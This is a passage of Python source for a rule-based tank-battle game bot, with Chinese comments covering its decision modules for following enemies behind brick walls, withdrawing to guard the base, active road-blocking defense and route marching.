这里添加一个主动跟随的逻辑,假如对方这回合破墙,那么我方这回合就会出现在对方墙后, 这样对方就无法进攻,甚至可以为我方进攻创造机会 5ce57677d2337e01c7a7c1ff """ def _make_decision(self): player = self._player map_ = player._map battler = player.battler Tank2Player = type(player) BattleTank = type(battler) if (player.has_status_in_previous_turns(Status.HAS_ENEMY_BEHIND_BRICK, turns=1) and not Action.is_move(player.get_previous_action(back=1)) ): # 上回合墙后有人 with map_.rollback_to_previous(): action = battler.get_next_attacking_action() if Action.is_stay(action): return oppTank = battler.get_enemy_behind_brick(action, interval=-1) # 找到墙后敌人 if oppTank is None: # 理论上不会存在? return oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) dodgeActions = oppBattler.try_dodge(battler) previousAction = oppPlayer.get_previous_action(back=1) if Action.is_stay(previousAction): return if previousAction in dodgeActions: # 敌人上回合从墙后闪开 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合的移动行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): # 确保跟随后还隔着墙 5ce90a90d2337e01c7abcd07 # 否则何必要跟随 ... player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction # # 将动作连续化,如果对方连续移动,那么可以考虑跟随 # if player.has_status_in_previous_turns(Status.READY_TO_FOLLOW_ENEMY): oppTank = None with map_.auto_undo_revert() as counter: # 有可能要多回合回滚 while map_.revert(): counter.increase() action = battler.get_next_attacking_action() if Action.is_stay(action): continue oppTank = battler.get_enemy_behind_brick(action, interval=-1) if oppTank is not None: oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) break if oppTank is not None: # 理论上一定会找到敌人 previousAction = oppPlayer.get_previous_action(back=1) lastAction = player.get_previous_action(back=1) # 上回合一定跟随移动 # 确保敌人在贴着墙移动,否则就不必继续跟随了 if np.abs(previousAction % 4 - lastAction % 4) in (0, 2): # 两次移动方向或相反 realAction = player.try_make_decision(previousAction) # 尝试跟随敌人上回合行为 if Action.is_move(realAction): with map_.simulate_one_action(battler, realAction): for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, BrickField): player.set_status(Status.READY_TO_FOLLOW_ENEMY) return realAction #{ END 'decision/single/follow_enemy_behind_brick.py' }# #{ BEGIN 'decision/single/withdrawal.py' }# class WithdrawalDecision(SingleDecisionMaker): """ 主动回撤逻辑 ------------- 如果我方大逆风,那么主动回防基地 具有一个持久性的记忆标签 KEEP_ON_WITHDRAWING 带有这个标签的 player 在决策的时候,比 WithdrawalDecision 优先级高的决策应该以 WITHDRAW 状态为优先 带有 WITHDRAW 持久标记的 player 决策必定会在此处终止,否则就要取消这个标记和状态, 让后续的决策继续进行 """ ALLOW_WITHDRAWAL = True # 一个测试用的 const,设为 False 则取消一切和 WITHDRAW 相关的决策 @CachedProperty def _GUARD_POINTS(self): """ 获得基地两个对角线位置的两个防御坐标 """ player = self._player map_ = player._map tank = player.tank side = tank.side base = map_.bases[side] _DIAGONAL_DIRECTIONS = ( (1, 1), (1, -1), (-1, 1), (-1, -1) ) x1, y1 = base.xy points = [] for dx, dy in _DIAGONAL_DIRECTIONS: x2 = x1 + dx y2 = y1 + dy if map_.in_map(x2, y2): points.append( (x2, y2) ) return points def _get_more_dangerous_guard_point(self, oppBattler): """ 更加危险的防御点,被认为是距离敌人更近的防御点 """ player = self._player battler = player.battler _GUARD_POINTS = self._GUARD_POINTS distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in _GUARD_POINTS ] return _GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 def _is_dangerous_action(self, action, oppBattler): """ 为了防止出现这样一种情况: 5ce9154fd2337e01c7abd81f 以及这样一种情况: 5cea5d38d2337e01c7ad8418 ---------------------------------- 1. 假如我方这回合移动,而敌人下回合通过非射击行为,可以面向我方基地(射击行为的话,下回合对方炮弹冷却, 对基地暂时不造成威胁),如果我方这回合选择不移动可以阻止它,那么就选择停止 2. 假如我方这回合射击,而敌人下回合通过非射击行为,可以面向我方基地,那么就选择停止 3. 假如我方先破一墙,对方出现在后面,那么就算是有威胁 """ player = self._player battler = player.battler map_ = battler._map if (Action.is_move(action) and not oppBattler.is_face_to_enemy_base() # 事实上应该不会出现 ): # 先保存所有可能行为,为了防止模拟我方行为后,射击能力被重置 _shouldStay = False enemyAction = Action.STAY with map_.simulate_one_action(battler, action): for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(oppBattler, _action): if oppBattler.is_face_to_enemy_base(): # 我方执行一步后,对方面对基地 _shouldStay = True enemyAction = _action break if _shouldStay: # 现在不模拟我方行为,然后同样模拟对方行为,看对方是否面对我方基地 with map_.simulate_one_action(oppBattler, enemyAction): if not oppBattler.is_face_to_enemy_base(): return True if (Action.is_shoot(action) and not oppBattler.is_face_to_enemy_base() # 敌人上回合没有面对我方基地 ): for _action in oppBattler.get_all_valid_move_actions() + [ Action.STAY ]: with map_.simulate_one_action(oppBattler, _action): if not oppBattler.is_face_to_enemy_base(): # 当敌人尚未面对我方基地 with map_.simulate_one_action(battler, action): if oppBattler.is_face_to_enemy_base(): # 我方射击一步后,敌人面对我方基地 return True # 不安全的 # 其他情况均认为安全 return False def _try_make_decision(self, action, oppBattler): """ Withdraw 下的 try_make_decision """ player = self._player Tank2Player = type(player) oppPlayer = Tank2Player(oppBattler) realAction = player.try_make_decision(action) if (Action.is_stay(realAction) and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=2) and player.has_status_in_previous_turns(Status.WAIT_FOR_WITHDRAWING, turns=2) and not Action.is_shoot(oppPlayer.get_previous_action(back=1)) and not Action.is_shoot(oppPlayer.get_previous_action(back=2)) ): # 如果等待了两回合,对方两回合均为射击那么视为安全 player.set_status(Status.FORCED_WITHDRAW) # 糟糕的设计!如果后续需要更改,那么需要在再删掉这个状态 realAction = action if (Action.is_stay(realAction) and not player.has_status(Status.FORCED_WITHDRAW) ): return Action.STAY if self._is_dangerous_action(realAction, oppBattler): player.remove_status(Status.FORCED_WITHDRAW) return Action.STAY return realAction def _get_next_action_to_guard_point(self, x2, y2, oppBattler): """ 获得趋近守卫点 (x2, y2) 的下一个行为 """ player = self._player battler = player.battler map_ = player._map base = map_.bases[battler.side] route = battler.get_route_to_point_by_move(x2, y2) assert not route.is_not_found() # 这个必定能找到路! action = battler.get_next_defensive_action(route) realAction = self._try_make_decision(action, oppBattler) if not Action.is_stay(realAction): with map_.simulate_one_action(battler, realAction): if not battler.is_closest_to(base): player.remove_status(Status.FORCED_WITHDRAW) return Action.STAY # 其实是可以确保一直停留在基地附近的? return realAction # stay/realAction def _make_decision(self): if not self.__class__.ALLOW_WITHDRAWAL: return self.__class__.UNHANDLED_RESULT player = self._player signal = self._signal map_ = player._map battler = player.battler base = map_.bases[battler.side] x2, y2 = base.xy Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=self.__class__.ALLOW_WITHDRAWAL) # # 首先,检查带有持久化 WITHDRAW 标签的 player # 该回合是否还需要真正的延续这个标签 # # 一种情况是考虑是否应该 # if (player.has_label(Label.KEEP_ON_WITHDRAWING) and status != Status.WITHDRAW # 实际评估不是 WITHDRAW ): strictStatus = evaluate_aggressive(battler, oppBattler, strict=True) if strictStatus == Status.AGGRESSIVE: # 假如对方上回合被击杀,那么我方大概率会触发侵略模式? player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.set_status(status) return # 留给其他 decision 处理 # # 一种情况是考虑上回合是否击杀了一个人 # if len([ _oppPlayer for _oppPlayer in player.opponents if _oppPlayer.defeated ]) == 1: teammate = player.teammate if not teammate.defeated: # 二打一的局势,此时 oppBattler 为剩下一个敌人 teammateBattler = teammate.battler _dontWithdraw = False _deltaDistanceToEnemy = battler.get_manhattan_distance_to(oppBattler) - teammateBattler.get_manhattan_distance_to(oppBattler) if _deltaDistanceToEnemy > 0: # 我比队友距离更远 _dontWithdraw = True elif _deltaDistanceToEnemy == 0: # 一样远 _deltaDistanceToOurBase = battler.get_manhattan_distance_to(base) - teammateBattler.get_manhattan_distance_to(base) if _deltaDistanceToOurBase > 0: # 我比队友理基地更远,那么让队友防御 _dontWithdraw = True elif _deltaDistanceToOurBase == 0: # 如果还是一样远 ... if not teammate.has_label(Label.DONT_WITHDRAW): # 避免两者同时强攻,那么就让先判断的队友进行强攻 _dontWithdraw = True if _dontWithdraw: player.remove_status(Status.WITHDRAW) player.remove_labels(Label.KEEP_ON_WITHDRAWING) player.add_labels(Label.DONT_WITHDRAW) return # 留给其他 decision 处理 if status == Status.WITHDRAW or player.has_status(Status.WITHDRAW): player.remove_labels(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) player.add_labels(Label.KEEP_ON_WITHDRAWING) # 这个状态一旦出现,就添加标记 # # (inserted) 不要轻易从中线撤退,应该想一下是否可以堵路 # if battler.is_near_midline(offset=2): # y = [2, 6] for action in [ Action.STAY ] + battler.get_all_valid_move_actions(): # 先判断 stay with map_.simulate_one_action(battler, action): if battler.can_block_this_enemy(oppBattler): player.set_status(Status.READY_TO_BLOCK_ROAD) return action # 不需要判断安全性? # # 1. 如果上回合已经到达基地附近,那么优先移动到基地对角线的位置等待 # 2. 必要时改变守卫的位置 # # TODO: # 如果能直接到达守卫点,那应该考虑一下直接到达 ... 而不要先把基地的墙凿了 # if battler.is_closest_to(base): player.set_status(Status.GRARD_OUR_BASE) moreDangerousPoint = None _shouldMoveToDangerousPoint = False # # 已到达基地附近,但是未到达守卫点,尝试移向守卫点 # if (battler.xy not in self._GUARD_POINTS # 为处在对角线防御位置 and not player.has_status(Status.BLOCK_ROAD_FOR_OUR_BASE) # 高优先级触发 ): moreDangerousPoint = self._get_more_dangerous_guard_point(oppBattler) _shouldMoveToDangerousPoint = True # # 已经到达守卫点,判断是否需要移向另一个守卫点 # if battler.xy in self._GUARD_POINTS: distancesToEnemy = [ oppBattler.get_manhattan_distance_to_point(x2, y2) for (x2, y2) in self._GUARD_POINTS ] moreDangerousPoint = self._GUARD_POINTS[ np.argmin(distancesToEnemy) ] # 距离敌人更近的点根据危险性 _shouldMoveToDangerousPoint = True if _shouldMoveToDangerousPoint: action = self._get_next_action_to_guard_point(*moreDangerousPoint, oppBattler) if not Action.is_stay(action): player.set_status(Status.MOVE_TO_ANOTHER_GUARD_POINT) else: player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) return action player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) # 设置为等待 return Action.STAY # 其他情况下继续等待 _route1 = battler.get_shortest_defensive_route() _route2 = oppBattler.get_shortest_attacking_route() # 如果不将我视为钢墙 _route3 = oppBattler.get_shortest_attacking_route( ignore_enemies=False, bypass_enemies=True) # 如果将我视为钢墙 # TODO: # 如果 route2 和 route3 距离差很大,那么可以选择不动 # if _route2.is_not_found() or _route3.is_not_found(): # 对方找不到进攻路线,那就相当于我方把路堵住了? return Action.STAY assert not _route1.is_not_found() # 这个不可能的吧 allowedDelay = _route2.length - (_route1.length - 2) # 我方防御路线比地方进攻路线领先值 allowedDelay -= 1 # 至少要快一步 if allowedDelay < 0: allowedDelay = 0 returnAction = Action.INVALID with outer_label() as OUTER_BREAK: for route in sorted( battler.get_all_shortest_defensive_routes(delay=allowedDelay), key=lambda route: estimate_route_blocking(route) ): # 阻塞程度最小的优先 action = battler.get_next_defensive_action(route) if Action.is_stay(action) and battler.is_closest_to(base): # 到达基地就等待了 returnAction = action raise OUTER_BREAK realAction = self._try_make_decision(action, oppBattler) if Action.is_stay(realAction): # 尽量找一条不是停留的路? player.remove_status(Status.FORCED_WITHDRAW) continue returnAction = realAction raise OUTER_BREAK if not Action.is_valid(returnAction): # 没有一个合适的行为? action = battler.get_next_defensive_action(_route1) # 那就随便来一个把 ... returnAction = self._try_make_decision(action, oppBattler) if Action.is_move(returnAction) or Action.is_shoot(returnAction): player.set_status(Status.READY_TO_WITHDRAW) else: # stay if battler.is_closest_to(base): player.set_status(Status.STAY_FOR_GUARDING_OUR_BASE) else: if player.get_risky_enemy() is not None: # 存在风险敌人就能判定是因为敌人阻挡? player.set_status(Status.WAIT_FOR_WITHDRAWING) player.set_status(Status.PREVENT_BEING_KILLED) return returnAction #{ END 'decision/single/withdrawal.py' }# #{ BEGIN 'decision/single/active_defense.py' }# class ActiveDefenseDecision(SingleDecisionMaker): """ 主动防御策略 ----------------------- 不要追击敌人,而是选择保守堵路策略! 1. 对于路线差为 2 的情况,选择堵路,而非重叠 2. 如果自己正常行军将会射击,那么判断射击所摧毁的块是否为敌人进攻路线上的块 如果是,则改为移动或者停止 """ ACTIVE_DEFENSE_MIN_TRIGGER_TURNS = 2 # 前两回合结束前不要触发主动防御! def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() # 从路线距离分析确定最近敌人 oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) if status == Status.DEFENSIVE: # 避免过早进入 DEFENSIVE 状态 #---------------------------- currentTurn = map_.turn if currentTurn < __class__.ACTIVE_DEFENSE_MIN_TRIGGER_TURNS and False: # 取消主动防御轮数限制? player.remove_status(Status.DEFENSIVE) player.set_status(Status.AGGRESSIVE) # 前期以侵略性为主 else: # 如果是距离为 2 #---------------- # 由于两者相对的情况在前面的 encount enemy 时会被处理,这里如果遇到这种情况 # 那么说明两者是出于不相对的对角线位置。 # _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: # # 此时应该考虑自己是否正处在敌方的进攻的必经之路上 # 如果是这样,那么考虑不动,这样最保守 # 否则在合适的回合冲上去挡路 # # 判定方法是将己方坦克分别视为空白和钢墙,看对方的最短路线长度是否有明显延长 # 如果有,那么就堵路 # # 需要能够正确应对这一局的情况 5cd356e5a51e681f0e921453 # TODO: # 事实上这一局敌方不管往左还是往右,都是8步,因此这里会判定为不堵路,所以就会主动重叠 # 但是,左右两边的走法是不一样的,往左走必定会走不通,左右的8步并不等价,这里需要还需要 # 进一步的分析路线的可走性 # # TODO: # 事实上这样不一定准确,因为如果敌人前面有一个土墙,那么他可以先打掉土墙 # 然后继续前移,这样敌方就可以选择继续往前移动 # enemyAttackRoute1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) enemyAttackRoute2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if enemyAttackRoute2.length > enemyAttackRoute1.length: # 路线增长,说明是必经之路 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 虽然路线长度相同,但是路线的可走性不一定相同,这里先衡量对方当前路线的可走性 # 如果本回合我方等待,敌人向前移动,那么敌方只有在能够不向原来位置闪避的情况下 # 才算是我堵不住他的路,否则仍然视为堵路成功 5cd356e5a51e681f0e921453 # x0, y0 = oppBattler.xy # 保存原始坐标 enemyMoveAction = oppBattler.get_next_attacking_action(enemyAttackRoute1) # ssert Action.is_move(enemyMoveAction) # 应该是移动 _shouldStay = False with map_.simulate_one_action(oppBattler, enemyMoveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 此时敌方与我相邻 _shouldStay = True # 这种情况才是真正的设为 True 否则不属于此处应当考虑的情况 for enemyDodgeAction in oppBattler.try_dodge(battler): with map_.simulate_one_action(oppBattler, enemyDodgeAction): if oppBattler.xy != (x0, y0): # 如果敌人移动后可以不向着原来的位置闪避 _shouldStay = False # 此时相当于不能堵路 break if _shouldStay: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 否则自己不处在敌方的必经之路上,考虑主动堵路 # if (not oppBattler.canShoot # 对方这回合不能射击 or (Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=2)) ) # 或者对方等待了两个回合,视为没有危险 ): # 不宜只考虑一回合,否则可能会出现这种预判错误的情况 5cdd894dd2337e01c79e9bed for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, moveAction): if battler.xy in enemyAttackRoute1: # 移动后我方坦克位于敌方坦克进攻路线上 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 我方的移动后仍然不会挡敌人的路?? for moveAction in battler.get_all_valid_move_actions(middle_first=True): # 中路优先 with map_.simulate_one_action(battler, moveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 如果移动后与敌人相邻 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 否则,就是和敌人接近的连个方向上均为不可走的! # 那么让后续的逻辑进行处理 pass ''' if ( # 可能是主动防御但是为了防止重叠而等待 ( player.has_status_in_previous_turns(Status.ACTIVE_DEFENSIVE, turns=1) and player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) and Action.is_stay(player.get_previous_action(back=1)) ) or # 可能是为了防止被杀而停止 ( player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED) and Action.is_stay(player.get_previous_action(back=1)) ) ): oppPlayer = Tank2Player(oppBattler) if Action.is_stay(oppPlayer.get_previous_action(back=1)): # 对方上回合在等待 # # 但是遇到这种情况就非常尴尬 5cd356e5a51e681f0e921453 # # 需要再判断一下是否有必要上前堵路 # _shouldMove = False x1, y1 = oppBattler.xy x2, y2 = _route[1].xy # 目标位置 enemyAttackRoute = oppBattler.get_shortest_attacking_route() if (x2, y2) in enemyAttackRoute: # 下一步移动为进攻路线 enemyMoveAction = Action.get_move_action(x1, y1, x2, y2) with map_.simulate_one_action(oppBattler, enemyMoveAction): for enemyDodgeAction in oppBattler.try_dodge(battler): # 如果敌人上前后可以闪避我 route1 = oppBattler.get_shortest_attacking_route() with map_.simulate_one_action(oppBattler, enemyDodgeAction): route2 = oppBattler.get_shortest_attacking_route() if route2.length <= route1.length: # 并且闪避的路线不是原路返回 _shouldMove = True break # # 真正的值得堵路的情况 # if _shouldMove: x1, y1 = battler.xy x2, y2 = _route[1].xy # 跳过开头 moveAction = Action.get_move_action(x1, y1, x2, y2) if map_.is_valid_move_action(battler, moveAction): # 稍微检查一下,应该本来是不会有错的 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction # # 否则选择不要上前和敌人重叠,而是堵路 # player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY''' # endif # 转向寻找和敌方进攻路线相似度更高的路线 #-------------------------------------- # enemyAttackRoute = oppBattler.get_shortest_attacking_route() closestAttackRoute = max( battler.get_all_shortest_attacking_routes(delay=3), # 允许 3 步延迟 key=lambda r: estimate_route_similarity(r, enemyAttackRoute) ) # 相似度最大的路线 # # 判断下一步是否可以出现在敌人的攻击路径之上 5cd31d84a51e681f0e91ca2c #------------------------------- # 如果可以,就移动过去 # for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, moveAction): x3, y3 = battler.xy # 获得移动后的坐标 if (x3, y3) in enemyAttackRoute: _willMove = False # 是否符合移动的条件 realAction = player.try_make_decision(moveAction) if Action.is_move(realAction): _willMove = True elif player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 打破僵局 oppBattler = player.get_risky_enemy() oppPlayer = Tank2Player(oppBattler) if (oppBattler.canShoot # 当回合可以射击 and not oppPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 ): # 说明敌人大概率不打算攻击我 _willMove = True # # 符合了移动的条件 # 但是还需要检查移动方向 # 不能向着远离敌人的方向移动,不然就会后退 ... 5cd33351a51e681f0e91da39 # if _willMove: distance1 = battler.get_manhattan_distance_to(oppBattler) with map_.simulate_one_action(battler, moveAction): distance2 = battler.get_manhattan_distance_to(oppBattler) if distance2 > distance1: # 向着远处移动了 pass else: # 添加一个限制,必须要移动后出现在敌人的附近 # 否则约束过弱,容易导致前期乱跑的情况 5cd39434a51e681f0e924128 # for enemy in oppBattler.get_enemies_around(): if enemy is tank: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction attackAction = battler.get_next_attacking_action(closestAttackRoute) realAction = player.try_make_decision(attackAction) # # 判断自己的下一步是否为敌人开路 #------------------------- # 如果自己下一个行为是射击,然后所射掉的块为敌人进攻路线上的块 # 那么将这个动作转为移动或者停止 # # TODO: # 这个动作是有条件的,通常认为是,块就处在敌人的周围,我将块打破后 # 敌人有炮,我不能马上移到块的,这样就可能让敌人过掉,在这种情况下避免开炮 # # TODO: # 不能被过掉的情况不准确!只有不再在同一直线的情况下才需要判断 5ce444a8d2337e01c7a5eaea # 如果两者处在同一条直线,假如双方都射击,那么下一回合就直接相遇,并不会出现被对方过掉的情况 # if (not battler.on_the_same_line_with(oppBattler) and Action.is_shoot(realAction) and battler.will_destroy_a_brick_if_shoot(realAction) # 下一步将会打掉一个墙 ): field = battler.get_destroyed_fields_if_shoot(realAction)[0] enemyAttackRoute = oppBattler.get_shortest_attacking_route() if enemyAttackRoute.has_block(field): # 打掉的 Brick 在敌人进攻路线上 # # 再尝试模拟,是否会导致上述情况 # _dontShoot = False with outer_label() as OUTER_BREAK: for enemyMoveAction in oppBattler.get_all_valid_actions(): # 一回合假设我方射击,敌人任意行为 with map_.simulate_multi_actions((battler, realAction), (oppBattler, enemyMoveAction)): moveAction = realAction - 4 # 二回合假设我方移动,敌人射击 for enemyShootAction in oppBattler.get_all_valid_shoot_actions(): # 自动判断是否可射击 with map_.simulate_multi_actions((battler, moveAction), (oppBattler, enemyShootAction)): if battler.destroyed: # 然后这回合我方坦克挂了 _dontShoot = True raise OUTER_BREAK if _dontShoot: player.set_status(Status.ACTIVE_DEFENSIVE) return player.try_make_decision(moveAction) # 移动/停止 # 否则直接采用主动防御的进攻策略 # # TODO: # 这是个糟糕的设计,因为这相当于要和下方的进攻代码重复一遍 # if battler.is_in_our_site(): # 只有在我方地盘的时候才触发 # # 首先实现禁止随便破墙 # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY # # 敌人下一步可能移到墙后面 # for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): if battler.get_enemy_behind_brick(realAction, interval=-1) is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY if Action.is_stay(realAction): # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 这段代码复制自下方的侵略模式 #-------------------------- if Action.is_move(attackAction): if player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 即将停留第二回合 oppPlayer = Tank2Player(oppBattler) if (Action.is_move(oppPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(oppBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 pass elif oppBattler.canShoot: # 当回合可以射击,并且我上回合停留,因此敌人上回合可以射击 # 说明敌人大概率不打算攻击我 player.set_status(Status.ACTIVE_DEFENSIVE) return attackAction player.set_status(Status.PREVENT_BEING_KILLED) # 否则标记为防止被杀,用于上面的触发 player.set_status(Status.ACTIVE_DEFENSIVE) return realAction #{ END 'decision/single/active_defense.py' }# #{ BEGIN 'decision/single/marching.py' }# class MarchingDecision(SingleDecisionMaker): """ 行军策略 ------------------------- 当身边没有和任何敌人正面遭遇的时候,尝试寻找最佳的进攻行为 1. 进攻 2. 不会主动破墙 3. 遇到僵局,会在指定回合后自动打破僵局 4. 遇到有风险的路径导致需要停止不前的,会考虑寻找相同长度但是安全的路径,并改变方向 5. ...... """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) # (inserted) 强攻信号 #------------------------- if signal == Signal.FORCED_MARCH: attackAction = battler.get_next_attacking_action() # 应该是移动行为,且不需检查安全性 player.set_status(Status.READY_TO_FORCED_MARCH) return ( attackAction, Signal.READY_TO_FORCED_MARCH ) oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" # 一定能找到路 if myRoute.is_not_found() or oppRoute.is_not_found(): # 可能出现这种队友堵住去路的及其特殊的情况! 5cdde41fd2337e01c79f1284 allowedDelay = 0 else: leadingLength = oppRoute.length - myRoute.length if leadingLength <= 0: allowedDelay = 0 # 不必别人领先的情况下,就不要 delay 了 ... else: allowedDelay = leadingLength # 允许和对手同时到达,但由于我方先手,实际上应该是领先的 # # 在我方地盘时,优先从边路攻击 # 到达敌方场地,优先从中路攻击 # # 5cde18e7d2337e01c79f47c8 # isMiddleFirst = False # isMiddleFirst = battler.is_in_enemy_site() # # TODO: # 不要采用中路优先的搜索,否则容易打出狭路,然后因为敌人对自己存在威胁而停止不前! # 5ce48c2fd2337e01c7a6459b isXAxisFirst = False # # 如果我方两架坦克都到达了敌方基地,处于双方均不回头的局面 5cec9157641dd10fdcc5f30d # 那么可以采用 x-axis-first 以更好地触发团队合作,因为它优先选择拆除 x = 4 的墙 # _allPlayers = [ player, teammate, *player.opponents ] if (all( _player.battler.is_in_enemy_site(include_midline=True) for _player in _allPlayers ) and all( not _player.battler.has_enemy_around() for _player in _allPlayers ) ): # 如果双方都处在对方基地,并且都没有遭遇到敌人 isMiddleFirst = True # 想要使用 x-axis-first 必须首先 middle-first isXAxisFirst = True if battler.is_in_our_site(): # # 在我方基地的时候,不要评估敌人对攻击路线的干扰,而是优先采用边路优先的搜索。这样可能和敌人相撞, # 但至少可以平局。如果在我方基地就开始衡量敌人的干扰,那么敌人绕边路的时候我方可能会选择中路, # 这种情况下可能会被另一边的敌人干扰,出现一牵二的局面。 # # 还可能遇到一种很糟糕的情况,就是我方为了绕开敌人而选择了一条比最短路线要长的路,这种情况下 # 可能我方最终就会落后与对方,这样如果还绕过了敌人,那就根本没法拦截了,到最后肯定是输。 # # TODO: # ---------------------- # 这个影响对于bot的侵略性影响非常大,因为很容易因此和对方平局。并且边路分拆难以触发合作拆家, # 进攻优势会被削弱。也许可以一牵二的情况进行特判,其他情况继续绕路? # 也许需要根据情况进行判定,毕竟一牵二的情况和绕路拆家结果反而赢了的情况是有的,而且似乎都不少见 # routes = battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst) else: routes = sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), key=lambda r: estimate_enemy_effect_on_route(r, player) ) route = None # 这回合的进攻路线 returnAction = Action.STAY # 将会返回的行为,默认为 STAY # # 对于最优方案的缓存,用于判断次优行为是否合理 # 没事老回头实在是太蠢了! 5cee6790641dd10fdcc8de2c # 有路也不是这样走啊! # _firstAttackAction = None # 第一条路线给出的进攻行为 _firstRealAction = None # 第一条路线下玩家真实决策的而行为 _firstPreventBeingKilled = False # 第一个进攻行为是否因为受到敌人拦截而受阻 _firstStatus = None # 缓存第一次决策时的状态 _isFirstRoute = False # 当前是否为第一条路径 _firstRoute = None # 缓存第一条路径 with outer_label() as OUTER_BREAK: # # TODO: # 仅仅在此处综合考虑路线长度和敌人的影响,有必要统一让所有尝试获得下一步行为的函数都 # 以于此处相同的方式获得下一攻击行为 # # for route in battler.get_all_shortest_attacking_routes(): # 目的是找到一个不是停留的动作,避免浪费时间 # for route in sorted_routes_by_enemy_effect( # battler.get_all_shortest_attacking_routes(delay=allowedDelay), player ): # for route in sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), # key=lambda r: estimate_enemy_effect_on_route(r, player) ): _cachedAttackActions = set() # 缓存已经考虑过的结果 for _idx, route in enumerate(routes): # 引入 idx 用于判断是第几个路线 # 首先清除可能出现的状态,也就是导致 stay 的状况 ????? _isFirstRoute = ( _idx == 0 ) if _idx == 1: # 恰好过了第二回合 _firstStatus = player.get_status().copy() # 确保所有 continue 语句设置的 status 都可以在这里被捕获 player.remove_status(Status.WAIT_FOR_MARCHING, Status.PREVENT_BEING_KILLED, Status.HAS_ENEMY_BEHIND_BRICK) attackAction = battler.get_next_attacking_action(route) if _isFirstRoute: # 缓存行为和路线 _firstAttackAction = attackAction _firstRoute = route if attackAction in _cachedAttackActions: # 缓存攻击行为,避免重复判断 continue _cachedAttackActions.add(attackAction) if Action.is_stay(attackAction): # 